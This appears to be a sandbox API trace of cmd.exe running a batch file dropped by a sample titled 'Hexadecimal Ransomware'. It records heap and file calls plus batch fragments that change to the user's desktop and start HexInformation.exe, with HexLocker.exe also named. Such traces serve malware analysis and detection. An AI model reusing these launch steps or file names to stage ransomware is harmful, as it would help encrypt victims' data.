(Heap=0x1dc256b0000, Flags=0x0, Ptr=0x1dc256bf3b0, Size=0x2a) returned 0x1dc256c2950 [0112.108] GetProcessHeap () returned 0x1dc256b0000 [0112.108] RtlSizeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, MemoryPointer=0x1dc256c2950) returned 0x2a [0112.108] GetProcessHeap () returned 0x1dc256b0000 [0112.108] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x28) returned 0x1dc256c3380 [0112.108] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x1dc25800120 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0112.108] malloc (_Size=0xffd2) returned 0x1dc25810100 [0112.108] ??_V@YAXPEAX@Z () returned 0x1dc25810100 [0112.109] malloc (_Size=0xffd2) returned 0x1dc258200e0 [0112.109] ??_V@YAXPEAX@Z () returned 0x1dc258200e0 [0112.109] malloc (_Size=0xffd2) returned 0x1dc258300c0 [0112.110] ??_V@YAXPEAX@Z () returned 0x1dc258300c0 [0112.110] GetProcessHeap () returned 0x1dc256b0000 [0112.110] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x58) returned 0x1dc256bec60 [0112.110] malloc (_Size=0xffce) returned 0x1dc258400a0 [0112.110] ??_V@YAXPEAX@Z () returned 0x1dc258400a0 [0112.111] malloc (_Size=0xffce) returned 0x1dc25850080 [0112.111] ??_V@YAXPEAX@Z () returned 0x1dc25850080 [0112.111] malloc (_Size=0xffce) returned 0x1dc25860060 [0112.111] ??_V@YAXPEAX@Z () returned 0x1dc25860060 [0112.112] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x1dc25860060 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0112.112] ??_V@YAXPEAX@Z () returned 0x1 [0112.112] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x407419d8c0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x1dc258400a0, nFileSystemNameSize=0x7fe7 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x407419d8c0*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0112.115] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0112.115] ??_V@YAXPEAX@Z () returned 0x8 [0112.115] ??_V@YAXPEAX@Z () returned 0x1 [0112.116] ??_V@YAXPEAX@Z () returned 0x1 [0112.117] malloc (_Size=0xffce) returned 0x1dc258400a0 [0112.118] ??_V@YAXPEAX@Z () returned 0x1dc258400a0 [0112.118] GetProcessHeap () returned 0x1dc256b0000 [0112.118] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x58) returned 0x1dc256bf080 [0112.118] GetProcessHeap () returned 0x1dc256b0000 [0112.118] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x260) returned 0x1dc256bc4a0 [0112.118] _wcsicmp (_String1="rd000db.dll", _String2=".") returned 68 [0112.119] _wcsicmp (_String1="rd000db.dll", _String2="..") returned 68 [0112.119] GetFileAttributesW (lpFileName="rd000db.dll" (normalized: "c:\\users\\fd1hvy\\desktop\\rd000db.dll")) returned 0x20 [0112.119] GetProcessHeap () returned 0x1dc256b0000 [0112.119] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0xffde) returned 0x1dc256d86c0 [0112.119] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x1dc256d86d0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0112.119] SetErrorMode (uMode=0x0) returned 0x0 [0112.119] SetErrorMode (uMode=0x1) returned 0x0 [0112.119] GetFullPathNameW (in: lpFileName="rd000db.dll", nBufferLength=0x7fe7, lpBuffer=0x1dc258400a0, lpFilePart=0x407419dd00 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\rd000db.dll", lpFilePart=0x407419dd00*="rd000db.dll") returned 0x23 [0112.119] SetErrorMode (uMode=0x0) returned 0x1 [0112.120] GetProcessHeap () returned 0x1dc256b0000 [0112.120] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x260) returned 0x1dc256be260 [0112.120] _wcsicmp (_String1="rd000db.dll", _String2=".") returned 68 [0112.120] _wcsicmp (_String1="rd000db.dll", _String2="..") returned 68 [0112.120] GetFileAttributesW (lpFileName="rd000db.dll" (normalized: "c:\\users\\fd1hvy\\desktop\\rd000db.dll")) returned 0x20 [0112.120] ??_V@YAXPEAX@Z () returned 0x1 [0112.121] GetProcessHeap () returned 0x1dc256b0000 [0112.121] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x28) returned 0x1dc256c30e0 [0112.121] GetProcessHeap () returned 0x1dc256b0000 [0112.121] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x40) returned 0x1dc256bf810 [0112.121] GetProcessHeap () returned 0x1dc256b0000 [0112.121] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x40) returned 0x1dc256bf4f0 [0112.121] ??_V@YAXPEAX@Z () returned 0x1 [0112.122] ??_V@YAXPEAX@Z () returned 0x1 [0112.124] malloc (_Size=0xffd2) returned 0x1dc258200e0 [0112.125] ??_V@YAXPEAX@Z () returned 0x1dc258200e0 [0112.126] GetProcessHeap () returned 0x1dc256b0000 [0112.126] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x810) returned 0x1dc256c34a0 [0112.126] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\rd000db.dll", fInfoLevelId=0x0, lpFindFileData=0x1dc256c34b4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1dc256c34b4) returned 0x1dc256bef00 [0112.126] malloc (_Size=0xffd2) returned 0x1dc258300c0 [0112.126] ??_V@YAXPEAX@Z () returned 0x1dc258300c0 [0112.127] malloc (_Size=0xffd2) returned 0x1dc258400a0 [0112.127] ??_V@YAXPEAX@Z () returned 0x1dc258400a0 [0112.127] wcscmp (_String1="rd000db.dll", _String2="*.*") returned 1 [0112.127] wcscmp (_String1="rd000db.dll", _String2="????????.???") returned 1 [0112.127] RtlDosPathNameToRelativeNtPathName_U_WithStatus () returned 0x0 [0112.127] NtOpenFile (in: FileHandle=0x407419db40, DesiredAccess=0x10000, ObjectAttributes=0x407419dae0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\FD1HVy\\Desktop\\rd000db.dll", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x407419dab0, ShareAccess=0x4, OpenOptions=0x5040 | out: FileHandle=0x407419db40*=0x9c, IoStatusBlock=0x407419dab0*(Status=0x0, Pointer=0x4000000000, Information=0x1)) returned 0x0 [0112.128] RtlReleaseRelativeName () returned 0x0 [0112.128] RtlFreeAnsiString (AnsiString="\\") [0112.128] NtQueryVolumeInformationFile (in: FileHandle=0x9c, IoStatusBlock=0x407419d9b8, FsInformation=0x407419d9b0, Length=0x8, FsInformationClass=0x4 | out: IoStatusBlock=0x407419d9b8, FsInformation=0x407419d9b0) returned 0x0 [0112.128] CloseHandle (hObject=0x9c) returned 1 [0112.128] ??_V@YAXPEAX@Z () returned 0x1 [0112.129] ??_V@YAXPEAX@Z () returned 0x1 [0112.130] FindNextFileW (in: hFindFile=0x1dc256bef00, lpFindFileData=0x1dc256c34b4 | out: lpFindFileData=0x1dc256c34b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd40e0104, ftCreationTime.dwHighDateTime=0x1d67c7d, ftLastAccessTime.dwLowDateTime=0xd40e0104, ftLastAccessTime.dwHighDateTime=0x1d67c7d, ftLastWriteTime.dwLowDateTime=0xd42a9d0f, ftLastWriteTime.dwHighDateTime=0x1d67c7d, nFileSizeHigh=0x0, nFileSizeLow=0xa35af, dwReserved0=0x0, dwReserved1=0x0, cFileName="rd000db.dll", cAlternateFileName="")) returned 0 [0112.131] GetLastError () returned 0x12 [0112.131] FindClose (in: hFindFile=0x1dc256bef00 | out: hFindFile=0x1dc256bef00) returned 1 [0112.131] ??_V@YAXPEAX@Z () returned 0x1 [0112.133] GetProcessHeap () returned 0x1dc256b0000 [0112.134] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256c34a0) returned 1 [0112.134] GetProcessHeap () returned 0x1dc256b0000 [0112.134] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bf4f0) returned 1 [0112.134] GetProcessHeap () returned 0x1dc256b0000 [0112.134] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256c30e0) returned 1 [0112.134] GetProcessHeap () returned 0x1dc256b0000 [0112.134] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bf810) returned 1 [0112.134] ??_V@YAXPEAX@Z () returned 0x1 [0112.279] GetProcessHeap () returned 0x1dc256b0000 [0112.279] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256be260) returned 1 [0112.279] GetProcessHeap () returned 0x1dc256b0000 [0112.279] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256d86c0) returned 1 [0112.279] GetProcessHeap () returned 0x1dc256b0000 [0112.279] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bc4a0) returned 1 [0112.279] GetProcessHeap () returned 0x1dc256b0000 [0112.279] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bf080) returned 1 [0112.279] GetProcessHeap () returned 0x1dc256b0000 [0112.279] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bec60) returned 1 [0112.279] GetProcessHeap () returned 0x1dc256b0000 [0112.279] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256c3380) returned 1 [0112.279] GetProcessHeap () returned 0x1dc256b0000 [0112.279] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256c2950) returned 1 [0112.279] ??_V@YAXPEAX@Z () returned 0x1 [0112.282] ??_V@YAXPEAX@Z () returned 0x1 [0112.285] _get_osfhandle (_FileHandle=1) returned 0x50 [0112.285] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x7) returned 1 [0112.365] _get_osfhandle (_FileHandle=1) returned 0x50 [0112.365] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0x7ff67b90fc08 | out: lpMode=0x7ff67b90fc08) returned 1 [0112.474] _get_osfhandle (_FileHandle=0) returned 0x4c [0112.474] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x7ff67b90fc0c | out: lpMode=0x7ff67b90fc0c) returned 1 [0112.620] SetConsoleInputExeNameW () returned 0x1 [0112.620] GetConsoleOutputCP () returned 0x1b5 [0112.720] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff67b90fbb0 | out: lpCPInfo=0x7ff67b90fbb0) returned 1 [0112.720] SetThreadUILanguage (LangId=0x0) returned 0x409 [0112.803] ??_V@YAXPEAX@Z () returned 0x1 [0112.807] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\9B7B.tmp\\9BBA.tmp\\9BCB.bat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\9b7b.tmp\\9bba.tmp\\9bcb.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x407419eef8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0112.807] _open_osfhandle (_OSFileHandle=0xa0, _Flags=8) returned 3 [0112.807] _get_osfhandle (_FileHandle=3) returned 0xa0 [0112.807] SetFilePointer (in: hFile=0xa0, lDistanceToMove=382, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x17e [0112.807] GetProcessHeap () returned 0x1dc256b0000 [0112.807] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256c2e90) returned 1 [0112.807] GetProcessHeap () returned 0x1dc256b0000 [0112.807] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256c2a90) returned 1 [0112.807] GetProcessHeap () returned 0x1dc256b0000 [0112.807] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256c2a50) returned 1 [0112.807] GetProcessHeap () returned 0x1dc256b0000 [0112.807] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256c4050) returned 1 [0112.807] GetProcessHeap () returned 0x1dc256b0000 [0112.807] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bba70) returned 1 [0112.808] _get_osfhandle (_FileHandle=3) returned 0xa0 [0112.808] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x17e [0112.808] ReadFile (in: hFile=0xa0, lpBuffer=0x7ff67b909970, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x407419eeb0, lpOverlapped=0x0 | out: lpBuffer=0x7ff67b909970*, lpNumberOfBytesRead=0x407419eeb0*=0x6b, lpOverlapped=0x0) returned 1 [0112.808] SetFilePointer (in: hFile=0xa0, lDistanceToMove=414, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x19e [0112.808] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff67b909970, cbMultiByte=32, lpWideCharStr=0x7ff67b913c30, cchWideChar=8191 | out: lpWideCharStr="cd C:\\Users\\%username%\\desktop\r\ne%\\desktop\\HexLocker.exe\r\nexe\r\nWindows\\MicrosoftNTSystem.sys\r\n") returned 32 [0112.808] _get_osfhandle (_FileHandle=3) returned 0xa0 [0112.808] GetFileType (hFile=0xa0) returned 0x1 [0112.808] _get_osfhandle (_FileHandle=3) returned 0xa0 [0112.808] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x19e [0112.808] GetProcessHeap () returned 0x1dc256b0000 [0112.808] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x4012) returned 0x1dc256d86c0 [0112.808] GetProcessHeap () returned 0x1dc256b0000 [0112.808] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x4010) returned 0x1dc256dc6e0 [0112.809] GetProcessHeap () returned 0x1dc256b0000 [0112.809] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x22) returned 0x1dc256c3230 [0112.809] GetEnvironmentVariableW (in: lpName="username", lpBuffer=0x7ff67b90bb90, nSize=0x2000 | out: lpBuffer="FD1HVy") returned 0x6 [0112.809] GetProcessHeap () returned 0x1dc256b0000 [0112.809] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256c3230) returned 1 [0112.809] GetProcessHeap () returned 0x1dc256b0000 [0112.809] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256dc6e0) returned 1 [0112.811] GetProcessHeap () returned 0x1dc256b0000 [0112.811] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256d86c0) returned 1 [0112.813] _wcsicmp (_String1="cd", _String2=")") returned 58 [0112.813] _wcsicmp (_String1="FOR", _String2="cd") returned 3 [0112.813] _wcsicmp (_String1="FOR/?", _String2="cd") returned 3 [0112.813] _wcsicmp (_String1="IF", _String2="cd") returned 6 [0112.813] _wcsicmp (_String1="IF/?", _String2="cd") returned 6 [0112.813] _wcsicmp (_String1="REM", _String2="cd") returned 15 [0112.813] _wcsicmp (_String1="REM/?", _String2="cd") returned 15 [0112.813] GetProcessHeap () returned 0x1dc256b0000 [0112.813] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0xb0) returned 0x1dc256bba70 [0112.813] GetProcessHeap () returned 0x1dc256b0000 [0112.813] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x16) returned 0x1dc256c42b0 [0112.813] GetProcessHeap () returned 0x1dc256b0000 [0112.813] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x42) returned 0x1dc256bf900 [0112.814] _tell (_FileHandle=3) returned 414 [0112.814] _close (_FileHandle=3) returned 0 [0112.814] malloc (_Size=0xffce) returned 0x1dc257e0160 [0112.816] ??_V@YAXPEAX@Z () returned 0x1dc257e0160 [0112.816] _wcsicmp (_String1="cd", _String2="DIR") returned -1 [0112.817] _wcsicmp (_String1="cd", _String2="ERASE") returned -2 [0112.817] _wcsicmp (_String1="cd", _String2="DEL") returned -1 [0112.817] _wcsicmp (_String1="cd", _String2="TYPE") returned -17 [0112.817] _wcsicmp (_String1="cd", _String2="COPY") returned -11 [0112.817] _wcsicmp (_String1="cd", _String2="CD") returned 0 [0112.817] GetConsoleTitleW (in: lpConsoleTitle=0x407419eca0, nSize=0x104 | out: lpConsoleTitle="Administrator: Hexadecimal Ransomware Main") returned 0x2c [0112.887] malloc (_Size=0xffce) returned 0x1dc257f0140 [0112.887] ??_V@YAXPEAX@Z () returned 0x1dc257f0140 [0112.888] malloc (_Size=0xffce) returned 0x1dc25800120 [0112.888] ??_V@YAXPEAX@Z () returned 0x1dc25800120 [0112.888] _wcsicmp (_String1="cd", _String2="DIR") returned -1 [0112.888] _wcsicmp (_String1="cd", _String2="ERASE") returned -2 [0112.888] _wcsicmp (_String1="cd", _String2="DEL") returned -1 [0112.888] _wcsicmp (_String1="cd", _String2="TYPE") returned -17 [0112.888] _wcsicmp (_String1="cd", _String2="COPY") returned -11 [0112.889] _wcsicmp (_String1="cd", _String2="CD") returned 0 [0112.889] ??_V@YAXPEAX@Z () returned 0x1 [0112.890] GetProcessHeap () returned 0x1dc256b0000 [0112.890] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x74) returned 0x1dc256bcf80 [0112.890] GetProcessHeap () returned 0x1dc256b0000 [0112.891] RtlReAllocateHeap (Heap=0x1dc256b0000, Flags=0x0, Ptr=0x1dc256bcf80, Size=0x42) returned 0x1dc256bcf80 [0112.891] GetProcessHeap () returned 0x1dc256b0000 [0112.891] RtlSizeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, MemoryPointer=0x1dc256bcf80) returned 0x42 [0112.891] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0112.891] malloc (_Size=0xffce) returned 0x1dc25800120 [0112.892] ??_V@YAXPEAX@Z () returned 0x1dc25800120 [0112.893] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0112.893] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1dc25800120, nVolumeNameSize=0x7fe7, lpVolumeSerialNumber=0x407419e7f0, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x407419e7f0*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0112.897] ??_V@YAXPEAX@Z () returned 0x1 [0112.899] GetProcessHeap () returned 0x1dc256b0000 [0112.899] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x48) returned 0x1dc256bf720 [0112.899] malloc (_Size=0xffce) returned 0x1dc25800120 [0112.901] ??_V@YAXPEAX@Z () returned 0x1dc25800120 [0112.901] GetProcessHeap () returned 0x1dc256b0000 [0112.901] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x74) returned 0x1dc256c66f0 [0112.901] GetProcessHeap () returned 0x1dc256b0000 [0112.902] RtlReAllocateHeap (Heap=0x1dc256b0000, Flags=0x0, Ptr=0x1dc256c66f0, Size=0x42) returned 0x1dc256c66f0 [0112.902] GetProcessHeap () returned 0x1dc256b0000 [0112.902] RtlSizeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, MemoryPointer=0x1dc256c66f0) returned 0x42 [0112.903] _wcsnicmp (_String1="C:", _String2="/D", _MaxCount=0x2) returned 52 [0112.903] malloc (_Size=0xffce) returned 0x1dc25810100 [0112.903] ??_V@YAXPEAX@Z () returned 0x1dc25810100 [0112.904] GetProcessHeap () returned 0x1dc256b0000 [0112.904] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0x40) returned 0x1dc256bf5e0 [0112.904] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x1dc25810100 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0112.904] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\desktop", nBufferLength=0x7fe7, lpBuffer=0x1dc25810100, lpFilePart=0x407419e520 | out: lpBuffer="C:\\Users\\FD1HVy\\desktop", lpFilePart=0x407419e520*="desktop") returned 0x17 [0112.904] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0112.904] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x407419e250 | out: lpFindFileData=0x407419e250*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x1dc256bef00 [0112.904] FindClose (in: hFindFile=0x1dc256bef00 | out: hFindFile=0x1dc256bef00) returned 1 [0112.905] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0x407419e250 | out: lpFindFileData=0x407419e250*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD1HVy", cAlternateFileName="")) returned 0x1dc256bf020 [0112.905] FindClose (in: hFindFile=0x1dc256bf020 | out: hFindFile=0x1dc256bf020) returned 1 [0112.905] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\desktop", lpFindFileData=0x407419e250 | out: lpFindFileData=0x407419e250*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe8e40f61, ftLastAccessTime.dwHighDateTime=0x1d67c7d, ftLastWriteTime.dwLowDateTime=0xe8e40f61, ftLastWriteTime.dwHighDateTime=0x1d67c7d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x1dc256bec60 [0112.905] FindClose (in: hFindFile=0x1dc256bec60 | out: hFindFile=0x1dc256bec60) returned 1 [0112.905] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0112.905] SetCurrentDirectoryW (lpPathName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 1 [0112.905] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\FD1HVy\\Desktop") returned 1 [0112.905] GetProcessHeap () returned 0x1dc256b0000 [0112.905] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bf990) returned 1 [0112.905] GetEnvironmentStringsW () returned 0x1dc256bf990* [0112.905] GetProcessHeap () returned 0x1dc256b0000 [0112.905] RtlAllocateHeap (HeapHandle=0x1dc256b0000, Flags=0x8, Size=0xec2) returned 0x1dc256d86c0 [0112.905] FreeEnvironmentStringsA (penv="=") returned 1 [0112.905] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x1dc257b0080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0112.906] GetProcessHeap () returned 0x1dc256b0000 [0112.906] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bf5e0) returned 1 [0112.906] ??_V@YAXPEAX@Z () returned 0x1 [0112.906] ??_V@YAXPEAX@Z () returned 0x1 [0112.907] ??_V@YAXPEAX@Z () returned 0x1 [0112.910] _get_osfhandle (_FileHandle=1) returned 0x50 [0112.910] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x7) returned 1 [0113.007] _get_osfhandle (_FileHandle=1) returned 0x50 [0113.007] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0x7ff67b90fc08 | out: lpMode=0x7ff67b90fc08) returned 1 [0113.098] _get_osfhandle (_FileHandle=0) returned 0x4c [0113.098] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x7ff67b90fc0c | out: lpMode=0x7ff67b90fc0c) returned 1 [0113.198] SetConsoleInputExeNameW () returned 0x1 [0113.198] GetConsoleOutputCP () returned 0x1b5 [0113.308] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff67b90fbb0 | out: lpCPInfo=0x7ff67b90fbb0) returned 1 [0113.308] SetThreadUILanguage (LangId=0x0) returned 0x409 [0113.379] ??_V@YAXPEAX@Z () returned 0x1 [0113.382] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\9B7B.tmp\\9BBA.tmp\\9BCB.bat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\9b7b.tmp\\9bba.tmp\\9bcb.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x407419eef8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0113.382] _open_osfhandle (_OSFileHandle=0xa0, _Flags=8) returned 3 [0113.382] _get_osfhandle (_FileHandle=3) returned 0xa0 [0113.382] SetFilePointer (in: hFile=0xa0, lDistanceToMove=414, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x19e [0113.382] GetProcessHeap () returned 0x1dc256b0000 [0113.382] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256c66f0) returned 1 [0113.383] GetProcessHeap () returned 0x1dc256b0000 [0113.383] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bf720) returned 1 [0113.383] GetProcessHeap () returned 0x1dc256b0000 [0113.383] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bcf80) returned 1 [0113.383] GetProcessHeap () returned 0x1dc256b0000 [0113.383] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bf900) returned 1 [0113.383] GetProcessHeap () returned 0x1dc256b0000 [0113.383] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256c42b0) returned 1 [0113.383] GetProcessHeap () returned 0x1dc256b0000 [0113.383] RtlFreeHeap (HeapHandle=0x1dc256b0000, Flags=0x0, BaseAddress=0x1dc256bba70) returned 1 [0113.383] _get_osfhandle (_FileHandle=3) returned 0xa0 [0113.383] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x19e [0113.383] ReadFile (in: hFile=0xa0, lpBuffer=0x7ff67b909970, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x407419eeb0, lpOverlapped=0x0 | out: lpBuffer=0x7ff67b909970*, lpNumberOfBytesRead=0x407419eeb0*=0x4b, lpOverlapped=0x0) returned 1 [0113.384] SetFilePointer (in: hFile=0xa0, lDistanceToMove=440, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1b8 [0113.384] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff67b909970, cbMultiByte=26, lpWideCharStr=0x7ff67b913c30, cchWideChar=8191 | out: lpWideCharStr="start HexInformation.exe\r\nktop\r\ne%\\desktop\\HexLocker.exe\r\nexe\r\nWindows\\MicrosoftNTSystem.sys\r\n") returned 26 [0113.384] _get_osfhandle (_FileHandle=3) returned 0xa0 [0113.384] GetFileType (hFile=0xa0) returned 0x1 [0113.384] _get_osfhandle (_FileHandle=3) returned 0xa0 [0113.384] 